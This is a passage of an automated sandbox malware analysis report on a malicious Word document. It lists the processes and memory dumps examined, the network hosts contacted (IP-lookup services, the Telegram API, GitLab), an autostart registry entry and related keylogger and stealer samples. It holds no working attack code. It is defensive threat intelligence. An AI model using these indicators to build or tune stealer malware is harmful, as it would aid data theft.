                                                                                                                                                                                    http://anglebug.com/3862chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://issuetracker.google.com/184850002msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://anglebug.com/4836chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://issuetracker.google.com/issues/166475273msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3517356481.00003A840002C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://.cssexample.exe, 0000000C.00000000.3282635316.00007FF6090DD000.00000002.00000001.01000000.00000004.sdmp, example.exe.0.drfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://aka.ms/dotnet-core-applaunch?example.exe.0.drfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://anglebug.com/5845chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://github.com/dotnet/runtimeexample.exe, 0000000C.00000002.3647342033.000001D6D44D0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3645471398.000001963F300000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3647199618.000001D6D4420000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3647121204.000001D6D43E1000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3648414415.000001D6D51F0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3645137007.000001963DAD0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648255484.000001D6D5180000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648674007.000001D6D5220000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3647038849.000001D6D4390000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648371388.000001D6D51D0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648814958.000001D6D5280000.00000004.00000020.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3645558187.000001963F311000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3648304673.000001D6D51A1000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3647262031.000001D6D4481000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3644724065.000001963D9F0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3647010977.000001D6D4370000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648392319.000001D6D51E0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://anglebug.com/5750chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://anglebug.com/4384chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://anglebug.com/6048chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://anglebug.com/3452chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high

                                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                            Public IPs

                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                            208.95.112.1
                                                                                                                                                                                                            		ip-api.comUnited States
                                                                                                                                                                                                            		53334TUT-ASUSfalse
                                                                                                                                                                                                            149.154.167.220
                                                                                                                                                                                                            		api.telegram.orgUnited Kingdom
                                                                                                                                                                                                            		62041TELEGRAMRUfalse
                                                                                                                                                                                                            172.65.251.78
                                                                                                                                                                                                            		gitlab.comUnited States
                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                            104.26.13.205
                                                                                                                                                                                                            		api.ipify.orgUnited States
                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                            Private

                                                                                                                                                                                                            IP
                                                                                                                                                                                                            127.0.0.1

                                                                                                                                                                                                            General Information

                                                                                                                                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                            Analysis ID:1590807
                                                                                                                                                                                                            Start date and time:2025-01-14 15:42:28 +01:00
                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                            Overall analysis duration:0h 9m 34s
                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                            Run name:Without Instrumentation
                                                                                                                                                                                                            Number of analysed new started processes analysed:21
                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                            Sample name:q9JZUaS1Gy.doc
                                                                                                                                                                                                            renamed because original name is a hash value
                                                                                                                                                                                                            Original Sample Name:0f53abadce48014ec8ea5458af9b732ed1ea6d612b54b261a0e60928e36e86f1.doc
                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                            Classification:mal100.troj.spyw.expl.evad.winDOC@17/16@4/5
                                                                                                                                                                                                            EGA Information:Failed
                                                                                                                                                                                                            HCA Information:Failed
                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                            • Found application associated with file extension: .doc
                                                                                                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                                                            • Attach to Office via COM
                                                                                                                                                                                                            • Scroll down
                                                                                                                                                                                                            • Close Viewer

                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, Runtimeuserer.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 2.23.242.162, 20.189.173.8, 2.21.65.149, 2.21.65.130, 52.109.89.19, 52.111.236.35, 52.111.236.33, 52.111.236.34, 52.111.236.32, 2.23.240.50, 20.190.159.4, 172.202.163.200
                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): e1324.dscd.akamaiedge.net, slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, weu-azsc-000.roaming.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, onedscolprdwus07.westus.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, templatesmetadata.office.net, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, uci.cdn.office.net, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, e26769.dscb.akamaiedge.ne
                                                                                                                                                                                                            • Execution Graph export aborted for target example.exe, PID 8044 because there are no executed function
                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                            15:47:17AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Update ""
                                                                                                                                                                                                            15:47:25AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Update ""

                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                            IPs

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            208.95.112.1VRO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ip-api.com/json/8.46.123.189
                                                                                                                                                                                                            mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ip-api.com/json/8.46.123.189
                                                                                                                                                                                                            VRO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ip-api.com/json/8.46.123.189
                                                                                                                                                                                                            mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ip-api.com/json/8.46.123.189
                                                                                                                                                                                                            iTVsz8WAu4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ip-api.com/json/8.46.123.189
                                                                                                                                                                                                            HLi4q5WAh3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ip-api.com/json/8.46.123.189
                                                                                                                                                                                                            e0691gXIKs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ip-api.com/json/8.46.123.189
                                                                                                                                                                                                            hJ1bl8p7dJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ip-api.com/json/8.46.123.189
                                                                                                                                                                                                            Y4TyDwQzbE.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ip-api.com/json/8.46.123.189
                                                                                                                                                                                                            DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ip-api.com/json/8.46.123.189
                                                                                                                                                                                                            149.154.167.220TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                              12.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                12.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                    slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                      ElixirInjector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                        QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                          Remittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                            PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                              FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse

                                                                                                                                                                                                                                Domains

                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                gitlab.com1KaTo6P18Z.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                5UnAIdF7m2.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                VRO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                VRO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                iTVsz8WAu4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                HLi4q5WAh3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                e0691gXIKs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                hJ1bl8p7dJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                ip-api.comVRO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                                mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                                VRO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                                mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                                iTVsz8WAu4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                                HLi4q5WAh3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                                e0691gXIKs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                                hJ1bl8p7dJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                                Y4TyDwQzbE.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                                DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                                api.ipify.orghttps://www.explorium.ai/notice-of-processing-for-eu-residents/?email=fabrice.duval@socotec.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 104.26.12.205
                                                                                                                                                                                                                                https://www.explorium.ai/notice-of-processing-for-eu-residents/?email=fabrice.duval@socotec.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 104.26.12.205
                                                                                                                                                                                                                                VRO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.67.74.152
                                                                                                                                                                                                                                mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 104.26.13.205
                                                                                                                                                                                                                                VRO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 104.26.12.205
                                                                                                                                                                                                                                mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.67.74.152
                                                                                                                                                                                                                                iTVsz8WAu4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.67.74.152
                                                                                                                                                                                                                                HLi4q5WAh3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.67.74.152
                                                                                                                                                                                                                                e0691gXIKs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 104.26.12.205
                                                                                                                                                                                                                                hJ1bl8p7dJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 104.26.12.205
                                                                                                                                                                                                                                api.telegram.orgTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                12.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                ElixirInjector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                Remittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                • 149.154.167.220

                                                                                                                                                                                                                                ASNs

                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                TELEGRAMRUTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                12.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                12.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                http://bu9.fysou.web.id/webs6/cx.aktifkn.fiturrGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 149.154.164.13
                                                                                                                                                                                                                                http://bu9.fysou.web.id/webs6/aktrfn.fitur.pylterGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 149.154.164.13
                                                                                                                                                                                                                                Handler.exeGet hashmaliciousDanaBot, VidarBrowse
                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                sysadmin.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                JUbmpeT.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                CLOUDFLARENETUS1KaTo6P18Z.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                http://guard-x-tech.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                                                5UnAIdF7m2.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                original.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                                                https://cloud.uibakery.io/share/Z0My4XaLtq/homeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.67.70.48
                                                                                                                                                                                                                                NoticeOfPayment.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.64.146.81
                                                                                                                                                                                                                                http://links.notification.intuit.com/ls/click?upn=u001.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4d1fnHXIidRtPiokrK2um0Eple-2FkJVLqDQnYz8JTbzkA9WlXWZlL3ivdsx3brpVaTH-2FK6m9Qw3cu-2BvTOlnjPR-2BRQieb3dMUHHYNG5OQm5ryxF0Fsg8fRojMxisWNsOHrH9C1cyNh2C-2BapzmizNqUYRxhHtg93ylBbIqH4SXA-2BcyHnCgzv3EsQu4AeMgUYmPWnA-3D-3DLdh5_yvrO630WiuT7pZuPPGURxafPbqYMaSDh9TJohqr8UezRE8eV8vDlm-2BTA5TmdEDZ7yETp46OEIM2MjRx5Mgc-2FSy44clVANtwLrq3nrTfwacsucNAXy1OR1t4kO8Runkcodfdl27Tk2P3ljoutL4PngQr5QuG6-2BzAFT5LByFkcNsd4ZN4BjPhWe-2FurNg8n55w3pC1a745KRvgSQJLhnfGqvVCPndWBC-2FrOGmouU9sI8e8126CrPE36g6YnfTU62FfgD4iz7YqhY5ClzJJ1rfDytmBE27deoiPYjSCUIOExKeOY9BXwol6hEnBu1JrowSiwfKjh7zwfuBtmrvZ6vSOSA4TPvkxfFcg8BlrW1vQm3N4xNhNATHmDPJ14VDZ37GTEiI3qtLYdiyXWWkTzMMnRfMqqHTb6pk7iw0nQ-2B-2F-2BoVFAByTiDqFl-2BEIRuBMpx3EAFKUBzR-2BFkYOUJfVO0AgKNNrj8RX8iEkzqu1jtQg7ixHYmsOTyS67b-2FfHfta82o4E2JYjYGlK5-2B4oC7YaK6nqpfLyDha24FrKV-2FLp72I4nvgzKLPEnT5ZwYuSOhCg3YVBTmOz2nIgG2JSkyg5oeFqAqgkNSx8fK8zislf-2BrA2fYIACU0BIPGyf0fmRMsEmqkL-2Bp3BFpdaGyMHdF1x-2BecUEBz6lLoiPwOcsUtngmDNDJXvvknBRqzikOl9M6fGqG3fXa1gCTdQ65koy28-2F-2BBWPXowJpnZS4HZIyZUo5CD6QHJWBreucOVPnNwQeZjC-2FzCK4Cce5NO367-2F8X6iGngzToJ76PKlG3iKmQrD2mUaULlSVRgzOCG3qGCu5c3-2FNswHxTGs5sX1Z4U8SbnKLBV1PKGCxM9T4n09h2aVmLlExK8v00nv29XzsU7Po9gelTF-2FjMSswYLkMiSOnzlY2BCdCwDuNC1nvBteBGpD-2F22OmpeXpRAaJ0J-2B4lsJiYMNTfeLTVpUwXJ8O1S1sYa5RHOdrs-2FcoPQw3UvxHuDk-2F8iCLoYwSk9C9RD2cz2elRWzi1C1ns-2FlhCnZAhjcKv9Z9Ae1z44jmN81TExev-2BlHq6EzmdhrItggowvzubiVKpLOI41-2FppAUrbGiqMHyKjd3-2F4kk-2Flz32iYslSzl6Dn0eXeS9GKE-2Bpl29Z6ROXa7u-2B5uui0VMIdUdli6dq52DdaYFYPlzSXZJZD6dU1iBoKstrswPNVadTn-2FAGgQ05qSC-2Bkb7G8HU-2BK5xqU5Ufalh9-2FjFROiYaxD3E-2Bu8NoLa7LrZn2WpO-2F0jyY6Vd6CrNPSPrDmzB8lSbamUhpcGSHkMvagS5o-2By7jAAciI99IX68zm80Q3YVM-2BJI1Dy0kwunCbTG4zRPUdxDxmPiGishQoGtkqOda43zr5FgVLFBsuyricc5CP0Uj0NZhEVb-2Br-2FOT93qdqnJE6-2FTp6T2R9YtWtiv-2BEfeLsX6gcdvCtN3M6I13WFY-2ByaP1CVexX5752k6SmFvyspk50EqGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                                                http://nkomm.frGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 1.1.1.1
